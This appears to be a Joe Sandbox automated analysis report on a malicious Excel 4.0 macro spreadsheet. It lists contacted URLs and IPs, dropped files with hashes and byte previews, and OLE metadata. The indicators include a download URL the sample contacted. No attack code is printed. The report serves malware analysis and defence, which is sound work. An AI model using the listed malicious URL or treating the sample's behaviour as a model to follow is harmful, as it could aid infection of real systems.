                                                                                                                                                https://skyapi.live.net/Activity/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/macABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://dataservice.o365filtering.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://api.cortana.aiABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://onedrive.live.comABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://ovisualuiapp.azurewebsites.net/pbiagave/ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://visio.uservoice.com/forums/368202-visio-on-devicesABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://directory.services.ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      104.21.29.200
                                                                                                                                                      unknownUnited States
                                                                                                                                                      13335CLOUDFLARENETUSfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                      Analysis ID:356299
                                                                                                                                                      Start date:22.02.2021
                                                                                                                                                      Start time:21:47:13
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 4m 14s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Sample file name:Document1094680387_02012021.xls
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:28
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal68.expl.evad.winXLS@3/8@1/1
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xls
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 184.30.21.144, 52.109.88.177, 52.109.12.22, 52.109.12.23, 52.255.188.83, 13.107.42.23, 13.107.5.88, 93.184.220.29, 23.210.248.85, 51.103.5.159, 51.11.168.160, 13.107.4.50, 20.54.26.129, 51.104.139.180, 92.122.213.247, 92.122.213.194, 51.103.5.186
                                                                                                                                                      • Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, ocsp.digicert.com, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, au-bg-shim.trafficmanager.net, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, ris.api.iris.microsoft.com, au.au-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, prod-w.nexus.live.com.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, nexus.officeapps.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, afdap.au.au-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, l-0014.l-msedge.net, au.c-0001.c-msedge.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356299/sample/Document1094680387_02012021.xls

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      CLOUDFLARENETUSDocument1094680387_02012021.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.149.197
                                                                                                                                                      New Order.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.71.230
                                                                                                                                                      PO#87498746510.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.172.17
                                                                                                                                                      muOvK6dngg.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.141.244
                                                                                                                                                      rieuro.dllGet hashmaliciousBrowse
                                                                                                                                                      • 104.20.185.68
                                                                                                                                                      TT.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.172.17
                                                                                                                                                      Payment_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.172.17
                                                                                                                                                      One Note shergott@vivaldicap.com.htmlGet hashmaliciousBrowse
                                                                                                                                                      • 104.16.18.94
                                                                                                                                                      TT.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.172.17
                                                                                                                                                      AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.62.185
                                                                                                                                                      purchase order 1.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.188.154
                                                                                                                                                      telex transfer.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.188.154
                                                                                                                                                      GPP.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.188.154
                                                                                                                                                      DHL Shipment Notification 6368638172.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.19.200
                                                                                                                                                      #11032019 de investigaci#U00f3n de #U00f3rdenes,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.19.200
                                                                                                                                                      Neue Bestellung_WJO-001, pdf.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.19.200
                                                                                                                                                      Halkbank_Ekstre_20210222_082357_541079.exeGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.19.200
                                                                                                                                                      swift payment.docGet hashmaliciousBrowse
                                                                                                                                                      • 104.21.19.200
                                                                                                                                                      FAX-MESSAGE201636576736375362.hTMlGet hashmaliciousBrowse
                                                                                                                                                      • 104.16.18.94
                                                                                                                                                      Order_C3350191107102300.exeGet hashmaliciousBrowse
                                                                                                                                                      • 172.67.188.154

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):132891
                                                                                                                                                      Entropy (8bit):5.375874945209489
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:PcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:/cQ9DQW+z0XiK
                                                                                                                                                      MD5:51C73D89B34FB7D38BD40D3D7A0AC838
                                                                                                                                                      SHA1:95BF4A2BF19DA56A1DE7FF17627562A4A4C945E3
                                                                                                                                                      SHA-256:58BD0352750CBDC9D74515B074873B71428A2515BD51C48A6A57A6F0CB4AF35E
                                                                                                                                                      SHA-512:3C30FAEF1005DA03ACBAD8CD2740F75CA98DFC6CEDEDB3842F58090FF9F9B2C48D57119CD08BF7010D0FCCC06D72A600364712D44A74326E69DAB1B095475913
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T20:48:05">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\32-422-76[1].htm
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                      Category:downloaded
                                                                                                                                                      Size (bytes):4318
                                                                                                                                                      Entropy (8bit):4.973500973626511
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1fRrvJADh/pRsjs1szbGD:1j9jhjYjWK/lyH+kBRADh/pmjs1sfGD
                                                                                                                                                      MD5:2271A813E52D489EFC10644E3624F03A
                                                                                                                                                      SHA1:1E4E70720F3340E19C1C0589052B38CC89FC8F08
                                                                                                                                                      SHA-256:FE8AFA0DD218BF8F982169AA3D3034E80F6FCC3BCB96B33C148658F9C5F64DD5
                                                                                                                                                      SHA-512:94338983CCA78FEE68458D4AF00EE25A2DE9FC227FF1B8B2B4AC6B25EA3F8C44EEFE6B5FC167BC71D3ECA371F3C37BE12FF3BF943ED3F92C953B736981766ACD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      IE Cache URL:http://healthymachinery.com/health/32-422-76.assp
                                                                                                                                                      Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\29810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):26537
                                                                                                                                                      Entropy (8bit):7.567228608474105
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:p8/JPq27jZ0qmF5rDJqHggmE/i8aoVT0QNuzWKPqGnHYHnSQ1DL1:OM0PmF5rlqHD9W+u7qkISQh1
                                                                                                                                                      MD5:71A4FAE3B261403E8F346CBEAC023C0F
                                                                                                                                                      SHA1:3EBB291493E48765E3FFC2A91912BE2240408D99
                                                                                                                                                      SHA-256:CC27EC99B68F894C0D41355422BE74E008CB02A6D2F4FAF856881B3B0CFFEBEE
                                                                                                                                                      SHA-512:CE9C539271DA2ABF1C9CE4FB6169325E7C292C68DB961E9558494221A32F9F880599FF6875D92B076710FFDF3023AA5C02B25747905FB90E94EF192B64E0A3DB
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Tue Feb 23 04:48:08 2021, atime=Tue Feb 23 04:48:08 2021, length=8192, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):904
                                                                                                                                                      Entropy (8bit):4.636598993707801
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:8iDpIcXUMuElPCH2AtXv8YovC+WrjAZ/2bDLLC5Lu4t2Y+xIBjKZm:8WpStXZAZiDy87aB6m
                                                                                                                                                      MD5:19A1D8EFD3912836B6B7B20D660B21EE
                                                                                                                                                      SHA1:FE8999836B1DBA1A85109DA9AF0177666E766DA9
                                                                                                                                                      SHA-256:AD08D1CC69E4FED6B9CDC60525EE1962A5B5ACC8EFCEB99ABF8E789F6D7F80D9
                                                                                                                                                      SHA-512:FBD362D8EF29A0B49860BACB4A0F56D70C51423C9D6A37216F5D212B073182F6DF69C6FC7D7160E69245FC5C9BFAFE48E539CEE5E22B22887602121D5A36D411
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F........N....-..{.dv....{.dv..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR.-....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.WR.-.....S....................C.Z.h.a.r.d.z.....~.1.....WR....Desktop.h.......Ny.WR.......Y..............>......s/.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......019635...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Document1094680387_02012021.xls.LNK
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Tue Feb 23 04:48:08 2021, atime=Tue Feb 23 04:48:08 2021, length=47616, window=hide
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2280
                                                                                                                                                      Entropy (8bit):4.650717467652025
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:8xtXjxkfUA5PqZDR37aB6myxtXjxkfUA5PqZDR37aB6m:8XTx+5PSGB6pXTx+5PSGB6
                                                                                                                                                      MD5:218BFD17D62B73CF284BD5F2355B5796
                                                                                                                                                      SHA1:535D401CAD260D739A6D277DC876942520550FA5
                                                                                                                                                      SHA-256:0552E4459E94830E443DE42F51397C68B8704F12597E66D8DC1A526E98E5584B
                                                                                                                                                      SHA-512:4F80034350A08C188D83FD20E230A721739D7841352314E45EF4BF31F92588B5E9E41E41CD0517DD352587B308A59B252F2856D7EC0FB6E172D637A4C34F2B23
                                                                                                                                                      Malicious:true
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: L..................F.... ...c4x.:.....kv......kv.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR.-....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny.WR.-.....S....................C.Z.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny.WR.-.....Y..............>.....b.G.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....WR.. .DOCUME~1.XLS..p......>QvxWR......h.....................|Q..D.o.c.u.m.e.n.t.1.0.9.4.6.8.0.3.8.7._.0.2.0.1.2.0.2.1...x.l.s.......e...............-.......d...........>.S......C:\Users\user\Desktop\Document1094680387_02012021.xls..6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t.1.0.9.4.6.8.0.3.8.7._.0.2.0.1.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......019635...........!a..%.H.VZAj...G..-.........-..!a..%.H.VZAj...G..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):146
                                                                                                                                                      Entropy (8bit):4.736208029951189
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:oyBVomMUdRRMJ9+XVEb5S/dRRMJ9+XVEbmMUdRRMJ9+XVEbv:dj6zJVVS6JVPzJVL
                                                                                                                                                      MD5:A63D8CF5169380B0183F9E71F82FEEAF
                                                                                                                                                      SHA1:FE40B0CA83AC3F12E9B9B682BE16AC4E41A0493D
                                                                                                                                                      SHA-256:08CA0FD88C254FCA760620CE907A08A8AA169641523D21EFE6C41597F56B94F4
                                                                                                                                                      SHA-512:6A04573A71AF9BBBC8296384D99DE1AE01C6A31B869541E2B7CE015F650E0C3240C7191BD78967A58C05D5038BFEEF3D4FBAF11B6879CDE313A87B5C28A0FA2F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: Desktop.LNK=0..[xls]..Document1094680387_02012021.xls.LNK=0..Document1094680387_02012021.xls.LNK=0..[xls]..Document1094680387_02012021.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\3A810000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):74344
                                                                                                                                                      Entropy (8bit):6.428137487610668
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:UY8rmOAIyyzElBIL6lECbgBGzP5xLmQWVxdxfrtvq7tvumPoY8rmOAIyyzElBILD:UY8rmOAIyyzElBIL6lECbgBGzP5xLm7h
                                                                                                                                                      MD5:7AAE8DE4C3B8E7CFB965820F6C0A4FBD
                                                                                                                                                      SHA1:9ABF9D0A7D1A646ECE6F10EB9F894088DE1B6DC1
                                                                                                                                                      SHA-256:FAA3238465319E5735D3B7132EC88DAB9B65A0F221F79A591071DF6114BB070C
                                                                                                                                                      SHA-512:134425D402647FDF1EBBB11F0E048E4B1D394EFDABE24D1D8A3690494E1011DCEBEEC649C1BE4841EEDFC316E853266A0352ECDE08289B4E4C032909AEBB13CE
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1...,...8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1.......8..........C.a.l.i.b.r.i.1...h...8..........C.a.m.b.r.i.a.1.......4..........C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1..................C.a.l.i.b.r.i.1................}..C.a.l.i.b.r.i.1................}..C.a.l.i.b.r.i.1.......>........}..C.a.l.i.b.r.i.1.......?........}..C.a.l.i.b.r.i.1.......4........}..C.a.l.i.b.r.i.1................}..C.a.l.i.b.r.i.1................}..C.a.l.i.b.r.i.1.......<........}..C.a.l.i.b.r.i.1.............
                                                                                                                                                      C:\Users\user\MORI.BAST
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:HTML document, ASCII text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4318
                                                                                                                                                      Entropy (8bit):4.973500973626511
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:1j9jwIjYjyDK/DZD8jH+k1fRrvJADh/pRsjs1szbGD:1j9jhjYjWK/lyH+kBRADh/pmjs1sfGD
                                                                                                                                                      MD5:2271A813E52D489EFC10644E3624F03A
                                                                                                                                                      SHA1:1E4E70720F3340E19C1C0589052B38CC89FC8F08
                                                                                                                                                      SHA-256:FE8AFA0DD218BF8F982169AA3D3034E80F6FCC3BCB96B33C148658F9C5F64DD5
                                                                                                                                                      SHA-512:94338983CCA78FEE68458D4AF00EE25A2DE9FC227FF1B8B2B4AC6B25EA3F8C44EEFE6B5FC167BC71D3ECA371F3C37BE12FF3BF943ED3F92C953B736981766ACD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 1 14:40:50 2021, Security: 0
                                                                                                                                                      Entropy (8bit):3.9082210251254503
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                      File name:Document1094680387_02012021.xls
                                                                                                                                                      File size:64512
                                                                                                                                                      MD5:9423ee9775707d51960e0eac95b3f6cc
                                                                                                                                                      SHA1:debc0defc997fde77a2f0cee9b3b1fcbed54ea91
                                                                                                                                                      SHA256:7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634
                                                                                                                                                      SHA512:0cff3519c5453bdeb13201849c571cbb142ed6780c2e6cae572104904af1190ff4d4e068ff0109953745b153fc219c618519318cadd4dcac300b3d280643bc53
                                                                                                                                                      SSDEEP:1536:TcPiTQAVW/89BQnmlcGvgZ6GrvhpJ8YUOMUt/BI/s/Vk/OZ/R/7/Gm/UQ/OhGW/x:TcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOA
                                                                                                                                                      File Content Preview:........................>.......................|...........................{..................................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Document1094680387_02012021.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:False

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1251
                                                                                                                                                      Author:
                                                                                                                                                      Last Saved By:Friner
                                                                                                                                                      Create Time:2006-09-16 00:00:00
                                                                                                                                                      Last Saved Time:2021-02-01 14:40:50
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1251
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:4096
                                                                                                                                                      Entropy:0.292801571342
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . B a s e . . . . . K l o p s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
